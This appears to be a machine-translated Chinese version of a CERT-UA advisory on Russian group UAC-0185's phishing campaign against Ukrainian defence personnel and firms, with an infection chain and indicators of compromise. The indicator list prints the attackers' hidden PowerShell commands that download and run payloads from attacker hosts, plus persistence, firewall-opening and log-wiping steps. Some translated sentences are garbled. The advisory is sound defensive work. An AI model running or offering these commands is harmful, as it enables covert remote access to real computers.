俄罗斯APT组织UAC-0185针对乌克兰国防军和军事国防企业的针对性网络攻击

2024年12月4日,乌克兰CERT-UA政府计算机应急响应小组收到了来自MIL.CERT-UA专家的信息,内容涉及主题为“attention_change_02-1-437 dated 04.12.2024”的电子邮件的分发,据报道称该电子邮件代表乌克兰工业家和企业家联盟(USPP)邀请参加专门讨论该主题的会议乌克兰国防工业产品向北约技术标准过渡于2024年12月5日在基辅以混合形式举行。
同时,信中包含一个超链接“附件包含您参与的重要信息”,如果点击它,快捷方式文件“lyst_02-1-437.lnk”将被下载到受害者的计算机上。打开LNK文件将导致使用标准 mshta.exe 实用程序下载并启动“start.hta”文件。上述 HTA 文件包含 JavaScript 代码,旨在运行两个 PowerShell 命令,其中一个命令将下载并提取 USPP信件形式的诱饵文件,第二个命令将下载“Front.png”文件,该文件是一个ZIP文件,其中包含三个文件:“Main.bat”、“Registry.hta”和“update.exe”,将压缩包内容解压到目录“%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\”并运行BAT文件“Main.bat”。
今晚将确保将“Registry.hta”文件传输到自动启动目录、执行该文件,以及从计算机中删除部分下载的文件。
最后,“Registry.hta”将运行“update.exe”,它被整理为MESHAGENT远程控制程序。
在研究过程中,发现了自 2023 年初以来用于网络攻击的其他文件和基础设施。
UAC-0185 (UNC4221) 至少自 2022 年以来一直处于活跃状态。该组织的主要目标是窃取“Signal”、“Telegram”、“WhatsApp”和军事系统“DELTA”、“TENETA”、“ Kropyva”的原理。同时,网络攻击的目的是使用专门的软件工具,特别是 MESHAGENT 和ULTRAVNC,对国防工业综合体企业以及乌克兰国防军员工的计算机未经授权的远程访问。更有限的方式。
海外合作委员会
MD5:
4f8e66f060ea918637b5e2dfe7fff16d e763ba973e455e684cba6649461e41f488a4a041b23442846c82c532e3a78806 лист_02-1-437.lnk a5b1a7db7abf94163a2871d0d7359b49 bf576d4fcbecdff07f71af2ace12cc53a2e03b16c464d4aefb393c4e719ddb17 start.hta 92b698f674370120ec399ad47600477b 1ffcc81d9194d3f84c9056db6833c99182d0c47f501134cf11a7e20f76dd0833 Back.png 104cd6e96a9898462335b0e63766a983 d2d5052b0c703a8b148aa6446d1a199aa59c590c5b534e45b03f1e8e74338c2b Front.png 34d1bd73883fd4b1709f4a41af70a192 6669f6cff75f27db3580ab76e4391245f8028c671198174a4ab0abbfc217f27c Registry.hta 7b7ccd7899b0b3b52398df45faf85078 689c7b5a63740593af5f931edccd04e5a0af4592f2159da1dc6ff9fb85724d6d Main.bat 4dbd1ced8da2a4acec15cfd9be73bfcc 831548a4bf76e77acb9858fffd2bb9a03b210f04f2b615b916e1a086e5421202 update.exe (MESHAGENT) bbb96f2781bc16813af398d4a1c5867a 6c8ff9dde75352c94afac0045c6fecc5c27181a941c371d165be5dc6f167969c Front.png 80ad42b66b4fc841bfa4210e23a2e757 6f4a305a1f5dbb11341986ad354aa5226afcb67b464d4914d9b3ec0c6cf7d887 rr.vbs c15e1d4892f10a62fec973d37805cc65 de66a95291321c8877b1c403357147d0c636c1e69f487579f8a2978a7ad7e2eb ultravnc.ini 99a0a704c31e84b0e8cb04c0f5ac2746 cb86993c83c30cd96c8b8fccd5236e5b5949ed400404c33ab74f173f7a9d53b9 gnv.exe (ULTRAVNC) 5883b5f221a9cb9dcdb4d7be923d4d98 57f5d4e69fb409ca448dcf7c281e130c66aff37178c827c4bdd6eebace0145e4 Main.bat e4d2f6d160ed8e4a2abd024dc9385ae1 71a27bc19cd4c3af587071d97afe205f1224f8a71d668683d1fba1969ea241a3 start.bat 882e5e17793b84ba2705b0e296777635 ff9002de29b7037bcf2d496a04df98aea4e8f81f88edf409cb65173e3cc194bd update.lnk 490450f5d2f1cb617e02366bc389bb7b 44cdc03e755bf1e7e60b460ab70834f44f7e4e9cb28591ffab99ca1517687ab2 OnedriveAgent.exe (MESHAGENT)
文件:
%HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\Main.bat %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\Registry.hta %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\update.exe %HOMEDRIVE%%HOMEPATH%\Downloads\20241288346.pdf %HOMEDRIVE%%HOMEPATH%\Main.zip %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Registry.hta %LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\ %LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\Main.bat %LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\Registry.hta %LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\update.exe %USERPROFILE%\Downloads\20241288346.pdf %USERPROFILE%\Main.zip powershell.exe . mshta hXXps://device.redirecl[.]com/yS558pd/start.hta mshta.exe hXXps://device.redirecl[.]com/yS558pd/start.hta cmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest hXXps://mail.outloolc[.]com/yS558pd/Back.png -OutFile %HOMEDRIVE%%HOMEPATH%\Downloads\20241288346.pdf" && start %HOMEDRIVE%%HOMEPATH%\Downloads\20241288346.pdf cmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest hXXps://mail.outloolc[.]com/yS558pd/Front.png -OutFile %HOMEDRIVE%%HOMEPATH%\Main.zip; Expand-Archive -LiteralPath %HOMEDRIVE%%HOMEPATH%\Main.zip -Destinationpath %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update" && start /b %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\Main.bat Expand-Archive -LiteralPath %HOMEDRIVE%%HOMEPATH%\Main.zip -Destinationpath %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update" cmd.exe /c %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\update.exe run copy "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\Registry.hta" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Registry.hta" start "" "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\Registry.hta" start %HOMEDRIVE%%HOMEPATH%\Downloads\20240188346.pdf del /s /q "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\Main.bat" del /s /q "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\Registry.hta" del /s /q "%HOMEDRIVE%%HOMEPATH%\Downloads\*.zip" del /s /q "%HOMEDRIVE%%HOMEPATH%\Main.zip" mkdir "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update" rmdir /s /q "%systemdrive%\$Recycle.bin" %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\Update.lnk %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\gnv.exe %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\rr.vbs del /s /q "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\Update.lnk" del /s /q "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\rr.vbs" del /s /q "%HOMEDRIVE%%HOMEPATH%\SS.bat" netsh advfirewall firewall add rule name="vnc" dir=in program=%HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\gnv.exe action=allow protocol=TCP localport=443 powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest hXXps://plntr.account-viewer[.]com/xS43HI3D/Back.png -OutFile %HOMEDRIVE%%HOMEPATH%\Downloads\20240188346.pdf" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest hXXps://plntr.account-viewer[.]com/xS43HI3D/Front.png -OutFile %HOMEDRIVE%%HOMEPATH%\Main.zip powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "start %HOMEDRIVE%%HOMEPATH%\AppData\Local\Microsoft\EdgeUpdate\Update\rr.vbs"
网络:
mititarycua@gmail[.]com hXXps://live.outloolc[.]com/mail_inbox=a098m (smb)://device.redirecl[.]com/davwwwroot/downloads/лист_02-1-437.lnk hXXps://device.redirecl[.]com/yS558pd/start.hta hXXps://mail.outloolc[.]com/yS558pd/Back.png hXXps://mail.outloolc[.]com/yS558pd/Front.png hXXp://svc.odwebp[.]com:443/agent.ashx (wss)://svc.odwebp[.]com:443/agent.ashx 146[.]59.102.122 185[.]158.248.104 live.outloolc[.]com mail.outloolc[.]com device.redirecl[.]com svc.odwebp[.]com uspp.derzhposluhy[.]com odwebp[.]com outloolc[.]com redirecl[.]com derzhposluhy[.]com i-ua.account-guard[.]site telegram.defender-bot[.]site telegram.token-defender[.]cloud account-guard[.]site defender-bot[.]site token-defender[.]cloud (tcp)://mirotrent[.]com:443 (tcp)://plntr.mirotrent[.]com:443 hXXps://cloud.account-viewer[.]com/tW018lIK/16_01.zip hXXps://get.god-le[.]com/hS483kf/Dack.png hXXps://get.god-le[.]com/hS483kf/Front.png hXXps://get.god-le[.]com/Gm912cj/icon.png hXXps://plntr.account-viewer[.]com/xS43HI3D/logo.png hXXps://plntr.account-viewer[.]com/xS43HI3D/Back.png hXXps://plntr.account-viewer[.]com/xS43HI3D/Front.png 136[.]243.237.26 5[.]181.156.72 account-viewer[.]com god-le[.]com god-le[.]net in-touc[.]com mail-gov[.]com mail-gov[.]net sign-cert[.]com mirotrent[.]com palantir[.]ink clouddrive[.]world emtserviceca[.]info account-saver[.]com mails[.]support check.sign-cert[.]com cloud.account-viewer[.]com cloud.god-le[.]net confirm.account-viewer[.]com device.redirecl[.]com dhl.redirecl[.]com drive.redirecl[.]com get.god-le[.]com get.in-touc[.]com get.mail-gov[.]com get.sign-cert[.]com ivanti.account-viewer[.]com plntr.mirotrent[.]com my.mail-gov[.]net plntr.account-viewer[.]com stellar.account-viewer[.]com Додаткові індикатори за більш ранні періоди 2022-09-12: 74f6bd1a80ebfeece1e65b441c2f46e2 delta_1.0.0.apk hXXp://185[.]225.35.75:30555/cc 185[.]225.35.75 217[.]144.102.219 45[.]147.179.185 46[.]30.44.144 62[.]113.110.100 cancel-auth[.]site confirmphone[.]site milgov[.]host milgov[.]site teiegram[.]host telegram-account[.]host telegram-auth[.]website telegramm-account[.]site web-telegram[.]host delta.milgov[.]site web.teiegram[.]host web.telegram-account[.]host web.telegramm-account[.]site web.web.telegram-account[.]host www.teiegram[.]host www.telegram-auth[.]website www.telegramm-account[.]site 212nj0b42w.web.telegram-account[.]host 658pvbhj2k7veemmv4.web.telegram-account[.]host spam.web-telegram[.]host hXXp://185[.]225.35.75:30555/cc hXXps://delta.milgov[.]site/ hXXps://web.telegram-account[.]host/ hXXps://web.telegram-account[.]host/#/login 2024-01-16: 176[.]57.212.217 193[.]203.202.168 217[.]151.229.29 kropyva[.]group kropyva[.]site teneta[.]group teneta[.]site group-teneta[.]online group.kropyva[.]site group.teneta[.]site (wss)://kropyva[.]group/qr hXXps://group-teneta[.]online/ hXXps://group.teneta[.]site/ hXXps://kropyva[.]group/ 2024-03-29: whatsapp-confirm[.]site passport-ukr-net[.]site protect-password[.]site telegram-confirm[.]site accept-action[.]site signal-confirm[.]site cancel-action[.]site drive-share[.]site share-drive[.]site group-invitation[.]site check-active[.]site qweasdzx[.]site qsrgh[.]site www.protect-password[.]site www.confirm-signal[.]site www.google-drive[.]site www.signal-confirm[.]site www.qsrgh[.]site www.accept-action[.]site whatsapp.protect-password[.]site telegram.check-active[.]site whatsapp.group-invitation[.]site google.drive-share[.]site google.share-drive[.]site telegram.qweasdzx[.]site